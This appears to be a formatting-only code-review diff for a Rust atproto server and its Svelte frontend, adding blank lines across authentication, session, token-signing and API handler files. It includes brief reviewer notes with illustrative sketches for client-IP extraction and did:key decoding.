frontend/src/App.svelte (+11): blank lines added between the route imports, the auth state/$effect setup, getComponent(), the derived currentPath/CurrentComponent state, the <main> template, the <style> block, and each CSS rule group (:root, the dark-mode media query, body, *, main, .loading).
frontend/src/lib/api.ts (+37): blank lines added between the API_BASE constant, the ApiError class, the xrpc<T> helper, each exported interface and type (Session, AppPassword, InviteCode, VerificationChannel, CreateAccountParams, CreateAccountResult, ConfirmSignupResult), and each method of the api object (createAccount through deleteRecord).
frontend/src/lib/auth.svelte.ts (+16): blank lines added between the import, the STORAGE_KEY constant, the AuthState interface, the $state store, and each function (saveSession, loadSession, initAuth, login, register, confirmSignup, resendVerification, logout, getAuthState, getToken, isAuthenticated, _testSetState, _testReset).
frontend/src/lib/router.svelte.ts (+3): blank lines added between the currentPath state, the hashchange listener, navigate(), and getCurrentPath().
frontend/src/main.ts (+2)
frontend/src/tests/setup.ts (+4): blank lines added between the imports, the locationHash variable, the window.location mock, and the beforeEach/afterEach hooks.
frontend/src/tests/utils.ts (+7): blank lines added between the imports and each helper (renderAndWait, waitForElement, waitForElementToDisappear, waitForText, mockLocalStorage, setAuthState, clearAuthState).
src/api/actor/mod.rs (+1)
src/api/actor/preferences.rs (+3): blank lines added between the use statements, the constants, GetPreferencesOutput, and PutPreferencesInput.
src/api/actor/profile.rs (+9): blank lines added between the use statements, the params/view structs (GetProfileParams, GetProfilesParams, ProfileViewDetailed, GetProfilesOutput), and the functions (get_local_profile_record, munge_profile_with_local, proxy_to_appview, get_profile, get_profiles).
src/api/admin/account/delete.rs (+2): blank lines added between the use statements, DeleteAccountInput, and delete_account.
src/api/admin/account/email.rs (+3): blank lines added between the use statements, SendEmailInput, SendEmailOutput, and send_email.
src/api/admin/account/info.rs (+6): blank lines added between the use statements, the structs (GetAccountInfoParams, AccountInfo, GetAccountInfosOutput, GetAccountInfosParams), and the handlers (get_account_info, get_account_infos).
src/api/admin/account/mod.rs (+1)
src/api/admin/account/update.rs (+6): blank lines added between the use statements and each input/handler pair (UpdateAccountEmailInput/update_account_email, UpdateAccountHandleInput/update_account_handle, UpdateAccountPasswordInput/update_account_password).
src/api/admin/invite.rs (+11): blank lines added between the use statements, the structs (DisableInviteCodesInput, GetInviteCodesParams, InviteCodeInfo, InviteCodeUseInfo, GetInviteCodesOutput, DisableAccountInvitesInput, EnableAccountInvitesInput), and the handlers (disable_invite_codes, get_invite_codes, disable_account_invites, enable_account_invites).
src/api/admin/mod.rs (+1)
src/api/admin/status.rs (+7): blank lines added between the use statements, the structs (GetSubjectStatusParams, SubjectStatus, StatusAttr, UpdateSubjectStatusInput, StatusAttrInput), and the handlers (get_subject_status, update_subject_status).
src/api/error.rs (+7): blank lines added between the use statements, ErrorBody, the ApiError enum, and each impl block (ApiError, IntoResponse, and the From conversions for sqlx::Error, TokenValidationError, and DbLookupError).
src/api/feed/actor_likes.rs (+3): blank lines added between the use statements, GetActorLikesParams, insert_likes_into_feed, and get_actor_likes.
src/api/feed/custom_feed.rs (+2): blank lines added between the use statements, GetFeedParams, and get_feed.
src/api/feed/mod.rs (+1)
src/api/feed/post_thread.rs (+10): blank lines added between the use statements, the thread types (GetPostThreadParams, ThreadViewPost, ThreadNode, ThreadNotFound, ThreadBlocked, PostThreadOutput), the MAX_THREAD_DEPTH constant, and the functions (add_replies_to_thread, get_post_thread, handle_not_found).
src/api/feed/timeline.rs (+4): blank lines added between the use statements, GetTimelineParams, get_timeline, get_timeline_with_appview, and get_timeline_local_only.
src/api/identity/account.rs (+4): blank lines added between the use statements, extract_client_ip, CreateAccountInput, CreateAccountOutput, and create_account.
src/api/identity/did.rs (+14): blank lines added between the use statements, the structs (ResolveHandleParams, GetRecommendedDidCredentialsOutput, VerificationMethods, Services, AtprotoPds, UpdateHandleInput), and the functions (resolve_handle, get_jwk, well_known_did, user_did_doc, verify_did_web, get_recommended_did_credentials, update_handle, well_known_atproto_did).
src/api/identity/mod.rs (+1)
src/api/identity/plc/mod.rs (+1)
src/api/identity/plc/request.rs (+2): blank lines added between the use statements, generate_plc_token, and request_plc_operation_signature.
src/api/identity/plc/sign.rs (+4): blank lines added between the use statements, SignPlcOperationInput, ServiceInput, SignPlcOperationOutput, and sign_plc_operation.
src/api/identity/plc/submit.rs (+2): blank lines added between the use statements, SubmitPlcOperationInput, and submit_plc_operation.
src/api/mod.rs (+1)
src/api/moderation/mod.rs (+3): blank lines added between the use statements, CreateReportInput, CreateReportOutput, and create_report.
src/api/notification/mod.rs (+1)
src/api/notification/register_push.rs (+3): blank lines added between the use statements, RegisterPushInput, the VALID_PLATFORMS constant, and register_push.
src/api/notification_prefs.rs (+4): blank lines added between the use statements, NotificationPrefsResponse, get_notification_prefs, UpdateNotificationPrefsInput, and update_notification_prefs.
src/api/proxy.rs (+1)
src/api/proxy_client.rs (+15): blank lines added between the use statements, the timeout/size constants, the PROXY_CLIENT static, and each item (proxy_client, is_ssrf_safe, is_unicast_ip, is_private_v4, the SsrfError enum and its Display/Error impls, HEADERS_TO_FORWARD, validate_at_uri, AtUriParts, validate_limit, validate_did, and the tests module).
src/api/read_after_write.rs (+19): blank lines added between the use statements, the header-name constants, the record/view types (PostRecord, ProfileRecord, RecordDescript, LikeRecord, LikeSubject, LocalRecords, ProxyResponse, AuthorView, PostView, FeedViewPost, FeedOutput), and the functions (get_records_since_rev, get_local_lag, extract_repo_rev, proxy_to_appview, format_munged_response, format_local_post, insert_posts_into_feed).
src/api/repo/blob.rs (+7): blank lines added between the use statements, the MAX_BLOB_SIZE constant, upload_blob, the listMissingBlobs types (ListMissingBlobsParams, RecordBlob, ListMissingBlobsOutput), find_blobs, and list_missing_blobs.
src/api/repo/import.rs (+3): blank lines added between the use statements, the import size/block limits, import_repo, and sequence_import_event.
src/api/repo/meta.rs (+2)
src/api/repo/mod.rs (+1)
src/api/repo/record/batch.rs (+7): blank lines added between the use statements, the MAX_BATCH_WRITES constant, the write types (WriteOp, ApplyWritesInput, WriteResult, ApplyWritesOutput, CommitInfo), and apply_writes.
src/api/repo/record/delete.rs (+2): blank lines added between the use statements, DeleteRecordInput, and delete_record.
src/api/repo/record/mod.rs (+1)
src/api/repo/record/read.rs (+2): blank lines added between the use statements, GetRecordInput, and get_record.
src/api/repo/record/utils.rs (+4): blank lines added before create_signed_commit and between it, the RecordOp enum, CommitResult, and commit_and_log.
src/api/repo/record/validation.rs (+1)
src/api/repo/record/write.rs (+2): blank lines added between the use statements, has_verified_notification_channel, and prepare_repo_write.
src/api/server/account_status.rs (+8): blank lines added between the use statements, the structs (CheckAccountStatusOutput, DeactivateAccountInput, DeleteAccountInput), and the handlers (check_account_status, activate_account, deactivate_account, request_account_delete, delete_account).
src/api/server/app_password.rs (+8): blank lines added between the use statements, the structs (AppPassword, ListAppPasswordsOutput, CreateAppPasswordInput, CreateAppPasswordOutput, RevokeAppPasswordInput), and the handlers (list_app_passwords, create_app_password, revoke_app_password).
src/api/server/email.rs (+7): blank lines added between the use statements, generate_confirmation_code, and each input/handler pair (RequestEmailUpdateInput/request_email_update, ConfirmEmailInput/confirm_email, UpdateEmailInput/update_email).
src/api/server/invite.rs (+12): blank lines added between the use statements, the invite structs (CreateInviteCodeInput, CreateInviteCodeOutput, CreateInviteCodesInput, CreateInviteCodesOutput, AccountCodes, GetAccountInviteCodesParams, InviteCode, InviteCodeUse, GetAccountInviteCodesOutput), and the handlers (create_invite_code, create_invite_codes, get_account_invite_codes).
src/api/server/mod.rs (+1)
src/api/server/password.rs (+5): blank lines added between the use statements, the helpers (generate_reset_code, extract_client_ip), and the input/handler pairs (RequestPasswordResetInput/request_password_reset, ResetPasswordInput/reset_password).
src/api/server/service_auth.rs (+3): blank lines added between the use statements, GetServiceAuthParams, GetServiceAuthOutput, and get_service_auth.
+12
src/api/server/session.rs
+12
src/api/server/session.rs
···
12
12
use serde::{Deserialize, Serialize};
13
13
use serde_json::json;
14
14
use tracing::{error, info, warn};
15
+
15
16
fn extract_client_ip(headers: &HeaderMap) -> String {
16
17
if let Some(forwarded) = headers.get("x-forwarded-for") {
17
18
if let Ok(value) = forwarded.to_str() {
···
27
28
}
28
29
"unknown".to_string()
29
30
}
31
+
30
32
#[derive(Deserialize)]
31
33
pub struct CreateSessionInput {
32
34
pub identifier: String,
33
35
pub password: String,
34
36
}
37
+
35
38
#[derive(Serialize)]
36
39
#[serde(rename_all = "camelCase")]
37
40
pub struct CreateSessionOutput {
···
40
43
pub handle: String,
41
44
pub did: String,
42
45
}
46
+
43
47
pub async fn create_session(
44
48
State(state): State<AppState>,
45
49
headers: HeaderMap,
···
155
159
did: row.did,
156
160
}).into_response()
157
161
}
162
+
158
163
pub async fn get_session(
159
164
State(state): State<AppState>,
160
165
BearerAuth(auth_user): BearerAuth,
···
194
199
}
195
200
}
196
201
}
202
+
197
203
pub async fn delete_session(
198
204
State(state): State<AppState>,
199
205
headers: axum::http::HeaderMap,
···
227
233
}
228
234
}
229
235
}
236
+
230
237
pub async fn refresh_session(
231
238
State(state): State<AppState>,
232
239
headers: axum::http::HeaderMap,
···
395
402
}
396
403
}
397
404
}
405
+
398
406
#[derive(Deserialize)]
399
407
#[serde(rename_all = "camelCase")]
400
408
pub struct ConfirmSignupInput {
401
409
pub did: String,
402
410
pub verification_code: String,
403
411
}
412
+
404
413
#[derive(Serialize)]
405
414
#[serde(rename_all = "camelCase")]
406
415
pub struct ConfirmSignupOutput {
···
413
422
pub preferred_channel: String,
414
423
pub preferred_channel_verified: bool,
415
424
}
425
+
416
426
pub async fn confirm_signup(
417
427
State(state): State<AppState>,
418
428
Json(input): Json<ConfirmSignupInput>,
···
535
545
preferred_channel_verified: true,
536
546
}).into_response()
537
547
}
548
+
538
549
#[derive(Deserialize)]
539
550
#[serde(rename_all = "camelCase")]
540
551
pub struct ResendVerificationInput {
541
552
pub did: String,
542
553
}
554
+
543
555
pub async fn resend_verification(
544
556
State(state): State<AppState>,
545
557
Json(input): Json<ResendVerificationInput>,
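
Reviewer note: extract_client_ip is defined in both password.rs and session.rs, and its body is elided by these hunks. The sketch below is illustrative only (the helper name and the exact parsing are assumptions, not the PR's code); it shows the conventional reading of x-forwarded-for that the visible skeleton appears to wrap, taking the first (client-most) entry and falling back to "unknown".

use axum::http::HeaderMap;

// Illustrative sketch, not the hunk's elided body: first x-forwarded-for entry or "unknown".
fn extract_client_ip_sketch(headers: &HeaderMap) -> String {
    if let Some(forwarded) = headers.get("x-forwarded-for") {
        if let Ok(value) = forwarded.to_str() {
            if let Some(first) = value.split(',').next() {
                let ip = first.trim();
                if !ip.is_empty() {
                    return ip.to_string();
                }
            }
        }
    }
    "unknown".to_string()
}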
+5
src/api/server/signing_key.rs
···
10
10
use serde::{Deserialize, Serialize};
11
11
use serde_json::json;
12
12
use tracing::{error, info};
13
+
13
14
const SECP256K1_MULTICODEC_PREFIX: [u8; 2] = [0xe7, 0x01];
15
+
14
16
fn public_key_to_did_key(signing_key: &SigningKey) -> String {
15
17
let verifying_key = signing_key.verifying_key();
16
18
let compressed_pubkey = verifying_key.to_sec1_bytes();
···
20
22
let encoded = multibase::encode(multibase::Base::Base58Btc, &multicodec_key);
21
23
format!("did:key:{}", encoded)
22
24
}
25
+
23
26
#[derive(Deserialize)]
24
27
pub struct ReserveSigningKeyInput {
25
28
pub did: Option<String>,
26
29
}
30
+
27
31
#[derive(Serialize)]
28
32
#[serde(rename_all = "camelCase")]
29
33
pub struct ReserveSigningKeyOutput {
30
34
pub signing_key: String,
31
35
}
36
+
32
37
pub async fn reserve_signing_key(
33
38
State(state): State<AppState>,
34
39
Json(input): Json<ReserveSigningKeyInput>,
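
Reviewer note: to make the multicodec framing in public_key_to_did_key concrete, here is a sketch of the inverse operation. It is not part of this change, and the helper name is invented for illustration; it assumes the multibase, k256, and anyhow crates already used in this file and in auth/verify.rs.

use k256::ecdsa::VerifyingKey;

// Illustrative inverse of public_key_to_did_key: multibase-decode, strip the
// 0xe7 0x01 secp256k1 multicodec prefix, then parse the compressed SEC1 point.
fn did_key_to_verifying_key(did_key: &str) -> anyhow::Result<VerifyingKey> {
    let encoded = did_key
        .strip_prefix("did:key:")
        .ok_or_else(|| anyhow::anyhow!("not a did:key"))?;
    let (_base, bytes) = multibase::decode(encoded)?;
    let point = bytes
        .strip_prefix(&[0xe7u8, 0x01])
        .ok_or_else(|| anyhow::anyhow!("unexpected multicodec prefix"))?;
    Ok(VerifyingKey::from_sec1_bytes(point)?)
}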
+2
src/api/temp.rs
···
8
8
use serde_json::json;
9
9
use crate::auth::{extract_bearer_token_from_header, validate_bearer_token};
10
10
use crate::state::AppState;
11
+
11
12
#[derive(Serialize)]
12
13
#[serde(rename_all = "camelCase")]
13
14
pub struct CheckSignupQueueOutput {
···
17
18
#[serde(skip_serializing_if = "Option::is_none")]
18
19
pub estimated_time_ms: Option<i64>,
19
20
}
21
+
20
22
pub async fn check_signup_queue(
21
23
State(state): State<AppState>,
22
24
headers: HeaderMap,
+2
src/api/validation.rs
···
3
3
pub const MAX_DOMAIN_LENGTH: usize = 253;
4
4
pub const MAX_DOMAIN_LABEL_LENGTH: usize = 63;
5
5
const EMAIL_LOCAL_SPECIAL_CHARS: &str = ".!#$%&'*+/=?^_`{|}~-";
6
+
6
7
pub fn is_valid_email(email: &str) -> bool {
7
8
let email = email.trim();
8
9
if email.is_empty() || email.len() > MAX_EMAIL_LENGTH {
···
49
50
}
50
51
true
51
52
}
53
+
52
54
#[cfg(test)]
53
55
mod tests {
54
56
use super::*;
+27
src/auth/extractor.rs
···
5
5
Json,
6
6
};
7
7
use serde_json::json;
8
+
8
9
use crate::state::AppState;
9
10
use super::{AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, validate_bearer_token_cached_allow_deactivated};
11
+
10
12
pub struct BearerAuth(pub AuthenticatedUser);
13
+
11
14
#[derive(Debug)]
12
15
pub enum AuthError {
13
16
MissingToken,
···
16
19
AccountDeactivated,
17
20
AccountTakedown,
18
21
}
22
+
19
23
impl IntoResponse for AuthError {
20
24
fn into_response(self) -> Response {
21
25
let (status, error, message) = match self {
···
45
49
"Account has been taken down",
46
50
),
47
51
};
52
+
48
53
(status, Json(json!({ "error": error, "message": message }))).into_response()
49
54
}
50
55
}
56
+
51
57
fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> {
52
58
let auth_header = auth_header.trim();
59
+
53
60
if auth_header.len() < 8 {
54
61
return Err(AuthError::InvalidFormat);
55
62
}
63
+
56
64
let prefix = &auth_header[..7];
57
65
if !prefix.eq_ignore_ascii_case("bearer ") {
58
66
return Err(AuthError::InvalidFormat);
59
67
}
68
+
60
69
let token = auth_header[7..].trim();
61
70
if token.is_empty() {
62
71
return Err(AuthError::InvalidFormat);
63
72
}
73
+
64
74
Ok(token)
65
75
}
76
+
66
77
pub fn extract_bearer_token_from_header(auth_header: Option<&str>) -> Option<String> {
67
78
let header = auth_header?;
68
79
let header = header.trim();
80
+
69
81
if header.len() < 7 {
70
82
return None;
71
83
}
84
+
72
85
if !header[..7].eq_ignore_ascii_case("bearer ") {
73
86
return None;
74
87
}
88
+
75
89
let token = header[7..].trim();
76
90
if token.is_empty() {
77
91
return None;
78
92
}
93
+
79
94
Some(token.to_string())
80
95
}
96
+
81
97
impl FromRequestParts<AppState> for BearerAuth {
82
98
type Rejection = AuthError;
99
+
83
100
async fn from_request_parts(
84
101
parts: &mut Parts,
85
102
state: &AppState,
···
90
107
.ok_or(AuthError::MissingToken)?
91
108
.to_str()
92
109
.map_err(|_| AuthError::InvalidFormat)?;
110
+
93
111
let token = extract_bearer_token(auth_header)?;
112
+
94
113
match validate_bearer_token_cached(&state.db, &state.cache, token).await {
95
114
Ok(user) => Ok(BearerAuth(user)),
96
115
Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated),
···
99
118
}
100
119
}
101
120
}
121
+
102
122
pub struct BearerAuthAllowDeactivated(pub AuthenticatedUser);
123
+
103
124
impl FromRequestParts<AppState> for BearerAuthAllowDeactivated {
104
125
type Rejection = AuthError;
126
+
105
127
async fn from_request_parts(
106
128
parts: &mut Parts,
107
129
state: &AppState,
···
112
134
.ok_or(AuthError::MissingToken)?
113
135
.to_str()
114
136
.map_err(|_| AuthError::InvalidFormat)?;
137
+
115
138
let token = extract_bearer_token(auth_header)?;
139
+
116
140
match validate_bearer_token_cached_allow_deactivated(&state.db, &state.cache, token).await {
117
141
Ok(user) => Ok(BearerAuthAllowDeactivated(user)),
118
142
Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown),
···
120
144
}
121
145
}
122
146
}
147
+
123
148
#[cfg(test)]
124
149
mod tests {
125
150
use super::*;
151
+
126
152
#[test]
127
153
fn test_extract_bearer_token() {
128
154
assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123");
···
130
156
assert_eq!(extract_bearer_token("BEARER abc123").unwrap(), "abc123");
131
157
assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123");
132
158
assert_eq!(extract_bearer_token(" Bearer abc123 ").unwrap(), "abc123");
159
+
133
160
assert!(extract_bearer_token("Basic abc123").is_err());
134
161
assert!(extract_bearer_token("Bearer").is_err());
135
162
assert!(extract_bearer_token("Bearer ").is_err());
+35
-1
src/auth/mod.rs
···
3
3
use std::fmt;
4
4
use std::sync::Arc;
5
5
use std::time::Duration;
6
+
6
7
use crate::cache::Cache;
8
+
7
9
pub mod extractor;
8
10
pub mod token;
9
11
pub mod verify;
12
+
10
13
pub use extractor::{BearerAuth, BearerAuthAllowDeactivated, AuthError, extract_bearer_token_from_header};
11
14
pub use token::{
12
15
create_access_token, create_refresh_token, create_service_token,
···
16
19
SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED,
17
20
};
18
21
pub use verify::{get_did_from_token, get_jti_from_token, verify_token, verify_access_token, verify_refresh_token};
22
+
19
23
const KEY_CACHE_TTL_SECS: u64 = 300;
20
24
const SESSION_CACHE_TTL_SECS: u64 = 60;
25
+
21
26
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
22
27
pub enum TokenValidationError {
23
28
AccountDeactivated,
···
25
30
KeyDecryptionFailed,
26
31
AuthenticationFailed,
27
32
}
33
+
28
34
impl fmt::Display for TokenValidationError {
29
35
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
30
36
match self {
···
35
41
}
36
42
}
37
43
}
44
+
38
45
pub struct AuthenticatedUser {
39
46
pub did: String,
40
47
pub key_bytes: Option<Vec<u8>>,
41
48
pub is_oauth: bool,
42
49
}
50
+
43
51
pub async fn validate_bearer_token(
44
52
db: &PgPool,
45
53
token: &str,
46
54
) -> Result<AuthenticatedUser, TokenValidationError> {
47
55
validate_bearer_token_with_options_internal(db, None, token, false).await
48
56
}
57
+
49
58
pub async fn validate_bearer_token_allow_deactivated(
50
59
db: &PgPool,
51
60
token: &str,
52
61
) -> Result<AuthenticatedUser, TokenValidationError> {
53
62
validate_bearer_token_with_options_internal(db, None, token, true).await
54
63
}
64
+
55
65
pub async fn validate_bearer_token_cached(
56
66
db: &PgPool,
57
67
cache: &Arc<dyn Cache>,
···
59
69
) -> Result<AuthenticatedUser, TokenValidationError> {
60
70
validate_bearer_token_with_options_internal(db, Some(cache), token, false).await
61
71
}
72
+
62
73
pub async fn validate_bearer_token_cached_allow_deactivated(
63
74
db: &PgPool,
64
75
cache: &Arc<dyn Cache>,
···
66
77
) -> Result<AuthenticatedUser, TokenValidationError> {
67
78
validate_bearer_token_with_options_internal(db, Some(cache), token, true).await
68
79
}
80
+
69
81
async fn validate_bearer_token_with_options_internal(
70
82
db: &PgPool,
71
83
cache: Option<&Arc<dyn Cache>>,
···
73
85
allow_deactivated: bool,
74
86
) -> Result<AuthenticatedUser, TokenValidationError> {
75
87
let did_from_token = get_did_from_token(token).ok();
88
+
76
89
if let Some(ref did) = did_from_token {
77
90
let key_cache_key = format!("auth:key:{}", did);
78
91
let mut cached_key: Option<Vec<u8>> = None;
92
+
79
93
if let Some(c) = cache {
80
94
cached_key = c.get_bytes(&key_cache_key).await;
81
95
if cached_key.is_some() {
···
84
98
crate::metrics::record_auth_cache_miss("key");
85
99
}
86
100
}
101
+
87
102
let (decrypted_key, deactivated_at, takedown_ref) = if let Some(key) = cached_key {
88
103
let user_status = sqlx::query!(
89
104
"SELECT deactivated_at, takedown_ref FROM users WHERE did = $1",
···
93
108
.await
94
109
.ok()
95
110
.flatten();
111
+
96
112
match user_status {
97
113
Some(status) => (Some(key), status.deactivated_at, status.takedown_ref),
98
114
None => (None, None, None),
···
112
128
{
113
129
let key = crate::config::decrypt_key(&user.key_bytes, user.encryption_version)
114
130
.map_err(|_| TokenValidationError::KeyDecryptionFailed)?;
131
+
115
132
if let Some(c) = cache {
116
133
let _ = c.set_bytes(&key_cache_key, &key, Duration::from_secs(KEY_CACHE_TTL_SECS)).await;
117
134
}
135
+
118
136
(Some(key), user.deactivated_at, user.takedown_ref)
119
137
} else {
120
138
(None, None, None)
121
139
}
122
140
};
141
+
123
142
if let Some(decrypted_key) = decrypted_key {
124
143
if !allow_deactivated && deactivated_at.is_some() {
125
144
return Err(TokenValidationError::AccountDeactivated);
126
145
}
146
+
127
147
if takedown_ref.is_some() {
128
148
return Err(TokenValidationError::AccountTakedown);
129
149
}
150
+
130
151
if let Ok(token_data) = verify_access_token(token, &decrypted_key) {
131
152
let jti = &token_data.claims.jti;
132
153
let session_cache_key = format!("auth:session:{}:{}", did, jti);
133
154
let mut session_valid = false;
155
+
134
156
if let Some(c) = cache {
135
157
if let Some(cached_value) = c.get(&session_cache_key).await {
136
158
session_valid = cached_value == "1";
···
139
161
crate::metrics::record_auth_cache_miss("session");
140
162
}
141
163
}
164
+
142
165
if !session_valid {
143
166
let session_exists = sqlx::query_scalar!(
144
167
"SELECT 1 as one FROM session_tokens WHERE did = $1 AND access_jti = $2 AND access_expires_at > NOW()",
···
149
172
.await
150
173
.ok()
151
174
.flatten();
175
+
152
176
session_valid = session_exists.is_some();
177
+
153
178
if session_valid {
154
179
if let Some(c) = cache {
155
180
let _ = c.set(&session_cache_key, "1", Duration::from_secs(SESSION_CACHE_TTL_SECS)).await;
156
181
}
157
182
}
158
183
}
184
+
159
185
if session_valid {
160
186
return Ok(AuthenticatedUser {
161
187
did: did.clone(),
···
166
192
}
167
193
}
168
194
}
195
+
169
196
if let Ok(oauth_info) = crate::oauth::verify::extract_oauth_token_info(token) {
170
197
if let Some(oauth_token) = sqlx::query!(
171
198
r#"SELECT t.did, t.expires_at, u.deactivated_at, u.takedown_ref
···
182
209
if !allow_deactivated && oauth_token.deactivated_at.is_some() {
183
210
return Err(TokenValidationError::AccountDeactivated);
184
211
}
212
+
185
213
if oauth_token.takedown_ref.is_some() {
186
214
return Err(TokenValidationError::AccountTakedown);
187
215
}
216
+
188
217
let now = chrono::Utc::now();
189
218
if oauth_token.expires_at > now {
190
219
return Ok(AuthenticatedUser {
···
195
224
}
196
225
}
197
226
}
227
+
198
228
Err(TokenValidationError::AuthenticationFailed)
199
229
}
230
+
200
231
pub async fn invalidate_auth_cache(cache: &Arc<dyn Cache>, did: &str) {
201
232
let key_cache_key = format!("auth:key:{}", did);
202
233
let _ = cache.delete(&key_cache_key).await;
203
234
}
235
+
204
236
#[derive(Debug, Serialize, Deserialize)]
205
237
pub struct Claims {
206
238
pub iss: String,
···
214
246
pub lxm: Option<String>,
215
247
pub jti: String,
216
248
}
249
+
217
250
#[derive(Debug, Serialize, Deserialize)]
218
251
pub struct Header {
219
252
pub alg: String,
220
253
pub typ: String,
221
254
}
255
+
222
256
#[derive(Debug, Serialize, Deserialize)]
223
257
pub struct UnsafeClaims {
224
258
pub iss: String,
225
259
pub sub: Option<String>,
226
260
}
227
-
// fancy boy TokenData equivalent for compatibility/structure
261
+
228
262
pub struct TokenData<T> {
229
263
pub claims: T,
230
264
}
+42
src/auth/token.rs
···
7
7
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
8
8
use sha2::Sha256;
9
9
use uuid;
10
+
10
11
type HmacSha256 = Hmac<Sha256>;
12
+
11
13
pub const TOKEN_TYPE_ACCESS: &str = "at+jwt";
12
14
pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt";
13
15
pub const TOKEN_TYPE_SERVICE: &str = "jwt";
···
15
17
pub const SCOPE_REFRESH: &str = "com.atproto.refresh";
16
18
pub const SCOPE_APP_PASS: &str = "com.atproto.appPass";
17
19
pub const SCOPE_APP_PASS_PRIVILEGED: &str = "com.atproto.appPassPrivileged";
20
+
18
21
pub struct TokenWithMetadata {
19
22
pub token: String,
20
23
pub jti: String,
21
24
pub expires_at: DateTime<Utc>,
22
25
}
26
+
23
27
pub fn create_access_token(did: &str, key_bytes: &[u8]) -> Result<String> {
24
28
Ok(create_access_token_with_metadata(did, key_bytes)?.token)
25
29
}
30
+
26
31
pub fn create_refresh_token(did: &str, key_bytes: &[u8]) -> Result<String> {
27
32
Ok(create_refresh_token_with_metadata(did, key_bytes)?.token)
28
33
}
34
+
29
35
pub fn create_access_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
30
36
create_signed_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, key_bytes, Duration::minutes(120))
31
37
}
38
+
32
39
pub fn create_refresh_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
33
40
create_signed_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, key_bytes, Duration::days(90))
34
41
}
42
+
35
43
pub fn create_service_token(did: &str, aud: &str, lxm: &str, key_bytes: &[u8]) -> Result<String> {
36
44
let signing_key = SigningKey::from_slice(key_bytes)?;
45
+
37
46
let expiration = Utc::now()
38
47
.checked_add_signed(Duration::seconds(60))
39
48
.expect("valid timestamp")
40
49
.timestamp();
50
+
41
51
let claims = Claims {
42
52
iss: did.to_owned(),
43
53
sub: did.to_owned(),
···
48
58
lxm: Some(lxm.to_string()),
49
59
jti: uuid::Uuid::new_v4().to_string(),
50
60
};
61
+
51
62
sign_claims(claims, &signing_key)
52
63
}
64
+
53
65
fn create_signed_token_with_metadata(
54
66
did: &str,
55
67
scope: &str,
···
58
70
duration: Duration,
59
71
) -> Result<TokenWithMetadata> {
60
72
let signing_key = SigningKey::from_slice(key_bytes)?;
73
+
61
74
let expires_at = Utc::now()
62
75
.checked_add_signed(duration)
63
76
.expect("valid timestamp");
77
+
64
78
let expiration = expires_at.timestamp();
65
79
let jti = uuid::Uuid::new_v4().to_string();
80
+
66
81
let claims = Claims {
67
82
iss: did.to_owned(),
68
83
sub: did.to_owned(),
···
76
91
lxm: None,
77
92
jti: jti.clone(),
78
93
};
94
+
79
95
let token = sign_claims_with_type(claims, &signing_key, typ)?;
96
+
80
97
Ok(TokenWithMetadata {
81
98
token,
82
99
jti,
83
100
expires_at,
84
101
})
85
102
}
103
+
86
104
fn sign_claims(claims: Claims, key: &SigningKey) -> Result<String> {
87
105
sign_claims_with_type(claims, key, TOKEN_TYPE_SERVICE)
88
106
}
107
+
89
108
fn sign_claims_with_type(claims: Claims, key: &SigningKey, typ: &str) -> Result<String> {
90
109
let header = Header {
91
110
alg: "ES256K".to_string(),
92
111
typ: typ.to_string(),
93
112
};
113
+
94
114
let header_json = serde_json::to_string(&header)?;
95
115
let claims_json = serde_json::to_string(&claims)?;
116
+
96
117
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
97
118
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
119
+
98
120
let message = format!("{}.{}", header_b64, claims_b64);
99
121
let signature: Signature = key.sign(message.as_bytes());
100
122
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
123
+
101
124
Ok(format!("{}.{}", message, signature_b64))
102
125
}
126
+
103
127
pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
104
128
Ok(create_access_token_hs256_with_metadata(did, secret)?.token)
105
129
}
130
+
106
131
pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
107
132
Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token)
108
133
}
134
+
109
135
pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
110
136
create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120))
111
137
}
138
+
112
139
pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
113
140
create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90))
114
141
}
142
+
115
143
pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> {
116
144
let expiration = Utc::now()
117
145
.checked_add_signed(Duration::seconds(60))
118
146
.expect("valid timestamp")
119
147
.timestamp();
148
+
120
149
let claims = Claims {
121
150
iss: did.to_owned(),
122
151
sub: did.to_owned(),
···
127
156
lxm: Some(lxm.to_string()),
128
157
jti: uuid::Uuid::new_v4().to_string(),
129
158
};
159
+
130
160
sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret)
131
161
}
162
+
132
163
fn create_hs256_token_with_metadata(
133
164
did: &str,
134
165
scope: &str,
···
139
170
let expires_at = Utc::now()
140
171
.checked_add_signed(duration)
141
172
.expect("valid timestamp");
173
+
142
174
let expiration = expires_at.timestamp();
143
175
let jti = uuid::Uuid::new_v4().to_string();
176
+
144
177
let claims = Claims {
145
178
iss: did.to_owned(),
146
179
sub: did.to_owned(),
···
154
187
lxm: None,
155
188
jti: jti.clone(),
156
189
};
190
+
157
191
let token = sign_claims_hs256(claims, typ, secret)?;
192
+
158
193
Ok(TokenWithMetadata {
